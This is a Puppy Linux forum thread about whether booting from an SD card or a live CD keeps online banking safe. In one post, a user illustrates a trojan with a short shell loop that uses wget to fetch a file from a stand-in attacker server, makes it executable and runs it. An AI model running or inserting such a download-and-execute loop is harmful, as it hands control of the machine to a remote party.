Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Sat 25 Oct 2014, 12:59
All times are UTC - 4
 Forum index » Off-Topic Area » Security
How secure is booting from internal SD card?
Post_new_topic   Reply_to_topic View_previous_topic :: View_next_topic
Page 1 of 3 Posts_count   Goto page: 1, 2, 3 Next
Author Message
Aung

Joined: 19 Jan 2007
Posts: 119
Location: Hervey Bay

PostPosted: Wed 16 Apr 2014, 04:13    Post_subject:  How secure is booting from internal SD card?  

I wish to know if booting from a SD card is as secure as booting from a live CD. I have tried booting with the switch on the SD card turned to lock (no writing to SD card) but Puppy dont finish booting. Firewall is always on. Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted.
Sometimes when internet banking I 'show desktop' to see if any of the drive icons are lit up. I notice that when Puppy is starting up it can peer into the drives to find the savefiles. Does that mean that once a cracker is inside ones box they could do the same.
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 06:10    Post_subject:  

If you can find a way for a 'cracker' to get into yer puppy then start panicking.

Done internet banking on windows and linux for many years...running mainly from hard drive.
One caveat...NEVER EVER use Internet Explorer/Outlook Express which would be difficult on linux anyway.

No saved passwords and I suppose you could go for a don't save at shutdown option if it makes you feel better.
Your sdcard will be fine.....only real danger is someone stealing yer SD card if you DID save passwords By the way my bank logs in without using passwords but instead a series of random predefined questions...seems a better idea.

No firewall apart from the one in the router which shows as stealth on shields up.

mike
Back to top
View user's profile Send_private_message 
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Wed 16 Apr 2014, 09:42    Post_subject:  

Quote:
Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted.

Yes.

Many cracks are like vamp's - they gain access by being invited in. Trojans that piggy-back into your system. A really simply virus could be as trivial as a repeated while loop - perhaps something along the lines of

while :
do
wget attackers_server/filename?somestring >/tmp/try
chmod a+x /tmp/try
/tmp/try &
sleep 3
done

that repeatedly tries code (script) sent from the hackers server (and that also gets fed some info in the somestring parameter passed to that server (I know, not the best of example scripts, but you get the idea)).

An intent hacker would obviously utilise something a lot more sophisticated. Low level code that might not even reveal that a drive had been mounted. Not even read only boot CD's are immune to such risk as the process could have been 'downloaded' to and be running in memory. The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site, as that greatly reduces the risk of catching such a virus.

If the opsys and/or browser have been used to visit any other web sites (or read emails, install progs etc.) at any prior time whilst having write access enabled, then there is a risk that it could have been compromised. Obviously a read only CD is more assured in that sense.

Another trick is to spoof your opsys and browser. Change the USER-AGENT from telling every site you visit that your running x version of linux and y version of browser to I'm running Windows and another version (or type) of browser. You want the spoofed choices to be relatively close to what you are running otherwise you'll hit problems with some web sites throwing you content that's inappropriate to your actual setup (or refusing to provide content because they don't know how to handle that choice of opsys/browser).
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 10:22    Post_subject:  

Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable an then run.... and don't even bother asking for actual instances of this happening.

mike
Back to top
View user's profile Send_private_message 
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Wed 16 Apr 2014, 12:19    Post_subject:  

mikeb wrote:
Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable an then run.... and don't even bother asking for actual instances of this happening.

I've previously sidestepped your repeated statements such as above Mike as I have no desire to cause upset nor argument. However you repeatedly say that you've been running Windows and Linux with minimal protection and not encountered problems yourself, stressing that its primarily just Windows and in particular Explorer/Outlook that are the risks - but its been widely accepted for years that the risks are more widespread. http://www.internetnews.com/dev-news/article.php/3601946 Nor is running Linux inherently safe for the more casual user.

Yes the risks have been reduced by centralising software distribution via responsibly run/maintained repositories - but not all users obtain all of their software solely via such verified/content-validated repositories.

I've only been using Linux LiveCD's for a couple of months and in the early days of that whilst looking around for an appropriate choice found some distro's with 8+ rootkits being reported.

Real and present.
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 12:27    Post_subject:  

Quote:
8+ rootkits being reported.


ok details would be interesting...not just for me but as a warning for others.
I hear lots of talk and potential threats...but details of real occurrences would be a real bonus to quantify and clarify the situation.

I am serious about security...i dont want viruses...just happens my approach seems simple and effective. I could claim it gives MAXIMUM protection since my results are better than those who run antivirus software.

Mike
Back to top
View user's profile Send_private_message 
James C


Joined: 26 Mar 2009
Posts: 5867
Location: Kentucky

PostPosted: Wed 16 Apr 2014, 13:05    Post_subject:  

The main threat to computer security is the person using the keyboard.
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 13:24    Post_subject:  

[url]The main threat to computer security is the person using the keyboard.[/url]
The only way left after other measures have been taken.

Does this not bring us to the running as root argument ...after all not running as administrator on windows is considered prudent.?

Bit torrent and gnutella is the home of manually installed windows viruses...are linux repos going to be the same?

mike
Back to top
View user's profile Send_private_message 
Aung

Joined: 19 Jan 2007
Posts: 119
Location: Hervey Bay

PostPosted: Sat 19 Apr 2014, 09:33    Post_subject:  

'No saved passwords and I suppose you could go for a don't save at shutdown option'

I dont save passwords but with Firefox that also seams to mean not to save form information also.

'The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,'

Thats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.

'Obviously a read only CD is more assured in that sense.'

Exactly, if only some one would make a 64 bit Slick Puppy with only, full networking so that every different modem could get online, firewall, Geany for saveing details of receipts, Firefox or chrome, most secure browsers, mpaint for taking a snapshot of the screen before and after pressing the submit button, even just vesa so that there is no need to lump around 30 mb of video card firmware.

'Another trick is to spoof your opsys and browser. Change the USER-AGENT'
Havent got a clue what a user agent is, but you are seaming to say it is not the way to go.

'No firewall apart from the one in the router which shows as stealth on shields up.'

Been to shield up with previous Puppies, dont know enough about ports to understand what shield up is saying but Puppys firewall shows up as being stealthy.

'The main threat to computer security is the person using the keyboard.'

Thats a lot of help!! BUT you are talking about me and a lot of people who use Puppy for banking and the like that dont know how ports are hardwired into a computer (or operating system.)
I have looked into the Fatdog CD in the help folder, help.msg and I cant see a line for booting into Ram but using the save file on SD card for my window settings, ect, only, not for saving to while on the net.
Is it possible to boot from SD card into ram, BUT using the savefile on the SD card BUT keeping the SD card READ only. As far as I can understand a live cd boots into ram and only saves data if one chooses on shutdown. After I finish banking using live cd, I close the browser, my data is still in ram, then I go off the net, data is still in ram, then I open Fatdog from the desktop icon (hoping that it hasnt been opened while I was on the net) and then send my data in ram to Fatdog on the hard drive. Can this be done with a SD card, (built in SD slot seen as an internal drive seen as sdb1 not USB.
Back to top
View user's profile Send_private_message 
amigo

Joined: 02 Apr 2007
Posts: 2261

PostPosted: Sat 19 Apr 2014, 10:44    Post_subject:  

By definition, a save-file has to be read-write -at least at the time of saving. and booting to RAM usually means starting with a clean slate -without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
Back to top
View user's profile Send_private_message 
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 11:16    Post_subject:  

Quote:
Quote:
The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,

Thats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.

533t_vesa_mesa.iso (or 533t_nvidia.iso for systems with Nvidia graphics card) weighs in at 250MB (260MB), but only around 100MB for the Puppy ISO part (rest is extra's i.e. SFS's that can be loaded for flash, abi/gnumeric, openshot/audacity). https://drive.google.com/folderview?id=0B4MbXu8cvE_WRVE4Y0FlZUgzcTg&usp=sharing

i.e. puppy sfs is around 70MB with another 25MB of drivers (zdrv sfs).

Typically takes less than 3 minutes (obviously with familiarity, longer for first time/learning) to get to banks web site via : boot CD, at desktop click connect and establish internet connection, open HOME and run quick_firewall_and_sound, set locale (restartX) and download/load latest firefox (HOME firefox file). That is however via a reasonably fast internet link (firefox download is around 30MB and on my 50Mb link speed takes just a few seconds to download).

Go to bank/online accounts - no where else before or after. Shutdown/reboot afterwards. i.e. booted from read only CD into RAM, new browser downloaded into and run from RAM, nowhere else before or after other than bank web site, HD's not even mounted.

For other stuff, boot as normal, load up abiword/gnumeric, flash, multi-media and use as desired. Encounter a virus and shutdown/restart and you're back to a clean system again.

I save all data (spreadsheets, documents etc) to a HD (could be a USB i.e. outside of Puppy space), so persistence from one session to another isn't required (no save file). I do also have a portable-firefox on the HD so that all bookmarks, extensions etc come all ready to go, but I run that with it in the back of my mind that its potentially unsafe.

The somewhat crude guide document (PDF) I've created for those that 'distro' is located at https://drive.google.com/file/d/0B4MbXu8cvE_WYTBGWk43OW5tNUE/edit?usp=sharing
Back to top
View user's profile Send_private_message 
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 11:38    Post_subject:  

Just timed the larger one (nvidia, Puppy SFS 78MB, drivers 34MB) and from complete power off to having a browser window up/running (booted, connected, firewall, set locale, restart x, download firefox) took 2 mins 40 seconds (25 seconds of that was the time to load the puppy sfs from CD during the boot process).

Not that unpractical ?!
Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Sat 19 Apr 2014, 11:54    Post_subject:  

Quote:
I dont save passwords but with Firefox that also seams to mean not to save form information also.

Yes that got messed up with firefox 3.5 plus... my semi fix is to click 'clear history when closes.'.. tick what you want and advanced and then unclick it again.. seems to make form saving work without passwords then as otherwise it does not do what the settings says it should.

A bit like cookie blocking only seems to work when you are in cookie approval mode.

Shields up... well thats probably your router doing its job which is stealth = hidden

I just boot normal system and bank online.
I drink tap water too Very Happy

mike
Back to top
View user's profile Send_private_message 
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 12:22    Post_subject:  

amigo wrote:
By definition, a save-file has to be read-write -at least at the time of saving. and booting to RAM usually means starting with a clean slate -without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.

I boot ram each and every time, so 'savefile' space is all of RAM (select the 'dont save' option at shutdown). So each and every session is pristine new. If I'm banking, I download the latest firefox direct from Mozilla, no plug-ins or extensions, go straight to banks web site, no where else either before or after (shutdown/reboot to clear memory). No HD's even mounted, all running in RAM from read only CD/DVD.

That's comparable to a frugal puppy pfix=ram - where no save file is loaded. Perhaps a bit safer because with frugal the puppy sfs (and drivers) might be being read from a read/write device (hard disk) assuming you had those copied over when you set up the frugal (even with frugal however you can overwrite that with a pmedia boot parameter).

As Mike suggests however, don't worry too much about it, there are plenty of bigger fish that hackers/thiefs will go after. If caught hacking the penalties are high, and it can be very difficult for them to completely cover their tracks - so instead they're more likely to go after easier/more rewarding prey (cash/ATM points, card scanning etc.).

I only run things the way I do because I don't like full installs as I often mess things up and getting back to how things were before is more of a pain with full installs IMO (I don't back up as often as I should and things always seem to trash when its been too long since I did a backup (or the backup fails to recover). I also don't like running with GRUB and would rather the HD was untouched other than whatever data files I opt to read/write to the HD. Also with savefiles even though if I keep regular backups, I either seem to exhaust savefile space at inopportune times and/or I get mixed up with which historic version I need to roll back to to get back to a 'how it was before - but not having lost too much stuff' state. I find that overall keeping opsys/gui (CD) completely separate from data (HD) works best for me (LiveCD).

I'm casual about where I surf to when in non-banking mode/sessions, caring little about the repercussions of what I try or do (PET's etc) as I know that the next session will be back to the original form. With full installs a single slip can result in having to spend an hour or more undoing/repairing stuff.
dt.jpg
 Description   
 Filesize   66.64 KB
 Viewed   152 Time(s)

dt.jpg

Back to top
View user's profile Send_private_message 
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Sat 19 Apr 2014, 12:44    Post_subject:  

hmm ...drifting into the area of save methods.... my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to i can choose not to save at shutdown so will revert to the last save on the next boot...handy when testing software for example but would provide a 'no save ' environment if desired... basically used the multisession cd idea and applied it to hard drive and usb use.

As mentioned it all becomes pretty unbreakable. Save space = ram plus swap space in effect so works a little differently and not overusing the save space is a good idea anyway.

It also means in usage terms its no different to a save file when it comes to boot times and convenience.

A variant on this theme is making a sfs of say a first run and using that... a snap shot of the basic setup in other words.
Or make a remaster just for the purpose and include system settings. (/etc)

SD card save means the save file is mounted so the card cannot be released even though changes are in ram/tmpfs.
The tmpfs is copied to the save file periodically unless disabled and at shutdown unless bypassed.

mike
Back to top
View user's profile Send_private_message 
Display_posts:   Sort by:   
Page 1 of 3 Posts_count   Goto page: 1, 2, 3 Next
Post_new_topic   Reply_to_topic View_previous_topic :: View_next_topic
 Forum index » Off-Topic Area » Security
Jump to:  

Rules_post_cannot
Rules_reply_cannot
Rules_edit_cannot
Rules_delete_cannot
Rules_vote_cannot
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.1080s ][ Queries: 12 (0.0080s) ][ GZIP on ]